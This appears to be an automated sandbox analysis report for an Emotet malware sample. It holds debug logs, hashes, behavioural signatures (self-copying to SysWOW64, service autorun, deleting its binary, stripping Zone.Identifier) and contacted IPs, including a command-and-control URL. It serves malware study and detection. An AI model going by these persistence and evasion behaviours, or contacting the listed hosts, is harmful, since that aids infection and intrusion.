2019-02-11 19:32:17,078 [root] DEBUG: SetInitialWriteBreakpoint: AllocationBase: 0x200000, AllocationSize: 0x10000, ThreadId: 0x8ac
2019-02-11 19:32:17,094 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x2, Address=0x200000 and Type=0x1.
2019-02-11 19:32:17,094 [root] DEBUG: SetBreakpoint: Set bp 0 type 1 at address 0x200000, size 2 with Callback 0x74943100, ThreadHandle = 0xac.
2019-02-11 19:32:17,094 [root] DEBUG: SetInitialWriteBreakpoint: Breakpoint 0 set write on word at base address: 0x200000
2019-02-11 19:32:17,094 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x1e177b
2019-02-11 19:32:17,109 [root] DEBUG: BaseAddressWriteCallback: Breakpoint 0 at Address 0x200000.
2019-02-11 19:32:17,109 [root] DEBUG: BaseAddressWriteCallback: byte written to 0x200000: 0x0.
2019-02-11 19:32:17,109 [root] DEBUG: ContextSetDebugRegister: Setting breakpoint 1 within Context, Size=0x0, Address=0x200000 and Type=0x0.
2019-02-11 19:32:17,109 [root] DEBUG: ContextSetBreakpoint: Call to ContextSetDebugRegister succeeded.
2019-02-11 19:32:17,109 [root] DEBUG: BaseAddressWriteCallback: Execution breakpoint 1 set base address: 0x200000, AllocationBaseExecBpSet = 1 (EIP = 0x1e177b)
2019-02-11 19:32:17,109 [root] DEBUG: BaseAddressWriteCallback executed successfully.
2019-02-11 19:32:17,141 [root] DEBUG: ProtectionHandler: Address: 0x251000, RegionSize: 0xf744
2019-02-11 19:32:17,141 [root] DEBUG: ProtectionHandler: attempting CAPE dump on region: 0x200000.
2019-02-11 19:32:17,141 [root] DEBUG: DumpPEsInRange: Scanning range 0x250000 - 0x260000.
2019-02-11 19:32:17,141 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x250000
2019-02-11 19:32:17,141 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:17,141 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x250000
2019-02-11 19:32:17,141 [root] DEBUG: DumpProcess: Module entry point VA is 0x25f5e0
2019-02-11 19:32:17,141 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2224_14117122311122019
2019-02-11 19:32:17,157 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:17,157 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x250000.
2019-02-11 19:32:17,187 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x250001-0x260000.
2019-02-11 19:32:17,187 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-02-11 19:32:17,187 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x200000 - 0x210000.
2019-02-11 19:32:17,187 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x200000.
2019-02-11 19:32:17,187 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 1 address 0x200000.
2019-02-11 19:32:17,187 [root] DEBUG: DumpPEsInRange: Scanning range 0x250000 - 0x260000.
2019-02-11 19:32:17,187 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x250000
2019-02-11 19:32:17,187 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:17,203 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x250000
2019-02-11 19:32:17,203 [root] DEBUG: DumpProcess: Module entry point VA is 0x25f5e0
2019-02-11 19:32:17,203 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2224_20417122311122019
2019-02-11 19:32:17,203 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:17,203 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x250000.
2019-02-11 19:32:17,219 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x250001-0x260000.
2019-02-11 19:32:17,219 [root] DEBUG: ProtectionHandler: Found and dumped PE image(s).
2019-02-11 19:32:17,219 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x251000 and Type=0x0.
2019-02-11 19:32:17,219 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x251000, size 0 with Callback 0x74942e90, ThreadHandle = 0xac.
2019-02-11 19:32:17,219 [root] DEBUG: ProtectionHandler: Execution breakpoint 0 set base address: 0x251000, AllocationBaseExecBpSet = 1
2019-02-11 19:32:17,234 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x251000
2019-02-11 19:32:17,234 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x251000.
2019-02-11 19:32:17,234 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x250000, size 0x10744).
2019-02-11 19:32:17,234 [root] DEBUG: DumpPEsInRange: Scanning range 0x250000 - 0x260744.
2019-02-11 19:32:17,250 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x250000
2019-02-11 19:32:17,250 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-02-11 19:32:17,250 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x250000
2019-02-11 19:32:17,250 [root] DEBUG: DumpProcess: Module entry point VA is 0x25f5e0
2019-02-11 19:32:17,250 [root] INFO: Added new CAPE file to list with path: C:\eqetkxw\CAPE\2224_49353382311122019
2019-02-11 19:32:17,250 [root] DEBUG: DumpProcess: Module image dump success
2019-02-11 19:32:17,250 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x250000.
2019-02-11 19:32:17,250 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x250001-0x260744.
2019-02-11 19:32:17,250 [root] DEBUG: MidPageExecCallback: PE image(s) detected and dumped.
2019-02-11 19:32:17,250 [root] DEBUG: MidPageExecCallback executed successfully.
2019-02-11 19:32:17,250 [root] INFO: Notified of termination of process with pid 2736.
2019-02-11 19:32:17,266 [root] WARNING: Unable to open termination event for pid 2736.
2019-02-11 19:32:17,266 [root] INFO: Notified of termination of process with pid 2832.
2019-02-11 19:32:17,608 [root] INFO: Process with pid 2832 has terminated
2019-02-11 19:32:17,608 [root] INFO: Process with pid 2736 has terminated
2019-02-11 19:35:37,867 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-02-11 19:35:37,867 [root] INFO: Created shutdown mutex.
2019-02-11 19:35:38,881 [root] INFO: Setting terminate event for process 2224.
2019-02-11 19:35:39,394 [root] INFO: Shutting down package.
2019-02-11 19:35:39,394 [root] INFO: Stopping auxiliary modules.
2019-02-11 19:35:39,394 [root] INFO: Finishing auxiliary modules.
2019-02-11 19:35:39,394 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-02-11 19:35:39,394 [root] INFO: Analysis completed.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2019-02-11 19:32:08 2019-02-11 19:35:53

File Details

File Name 58273d0d9c7700fa13dc63096b08967ae926db6d|EYblPodL.exe
File Size 470528 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 656e02696cf6c513ad72c009e9d337b5
SHA1 58273d0d9c7700fa13dc63096b08967ae926db6d
SHA256 f9604051cf7518348b294c2afdc47d786cac4f51d503b26f0731dc7deee72369
SHA512 0748cbe1f892db1fd2bd0a257f269438663449b1342af31e183304e48c45e61f3b54c9bbc2e3b0634563465890d441f5265c7c7b5dbbc7929bbcaee492ed9520
CRC32 2345913F
Ssdeep 3072:Ich6OhgjArPuHPhYR/UctWYNqHfkU81o4U5oij9Fk0lNJCqfcWEj6bl13wa0gRUN:/q0X0vwa0PXqWbZR/
TrID
  • 34.2% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 23.4% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 10.7% (.EXE) Win16/32 Executable Delphi generic (2072/23)
  • 10.5% (.EXE) OS/2 Executable (generic) (2029/13)
  • 10.4% (.EXE) Generic Win/DOS Executable (2002/3)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Download Download ZIP Resubmit sample

Signatures

Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2932 trigged the Yara rule 'Emotet'
Hit: PID 2832 trigged the Yara rule 'Emotet'
Mimics the system's user agent string for its own requests
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/FreeConsole
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureW
Expresses interest in specific running processes
process: dafpanes.exe
process: sPVjc.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://200.110.85.138:990/
Performs some HTTP requests
url: http://200.110.85.138:990/
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\dafpanes.exe:Zone.Identifier
Installs itself for autorun at Windows startup
service name: dafpanes
service path: "C:\Windows\SysWOW64\dafpanes.exe"
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\dafpanes.exe
Drops a binary and executes it
binary: C:\Windows\SysWOW64\dafpanes.exe

Screenshots


Hosts

Direct IP Country Name
Y 64.32.70.194 [VT] Dominican Republic
Y 200.110.85.138 [VT] Ecuador
Y 187.131.137.216 [VT] Mexico
Y 174.84.250.37 [VT] United States

DNS

No domains contacted.


Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\
C:\Users\user\AppData\Local\Temp\sPVjc.exe
C:\Windows\SysWOW64\compareiface.exe
C:\Windows\
C:\Windows\SysWOW64\
\Device\KsecDD
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\dafpanes.exe
C:\Users
\??\MountPointManager
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Temp
C:\Windows
C:\Windows\SysWOW64
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Users\user\AppData\Local\
C:\Windows\SysWOW64\dafpanes.exe:Zone.Identifier
C:\Windows\Temp
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\sPVjc.exe
\Device\KsecDD
C:\Windows\SysWOW64\shell32.dll
C:\
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Windows
C:\Users\user\AppData\Local\Temp
C:\Windows\SysWOW64\dafpanes.exe
C:\Windows\SysWOW64\dafpanes.exe
C:\Windows\SysWOW64\compareiface.exe
C:\Users\user\AppData\Local\Temp\sPVjc.exe
C:\Windows\SysWOW64\dafpanes.exe:Zone.Identifier
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\NoFileFolderConnection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\sPVjc.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cd-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{3abfb8f2-2ffd-11e7-a4cf-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5e1375cc-b5ba-11e3-a2f5-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
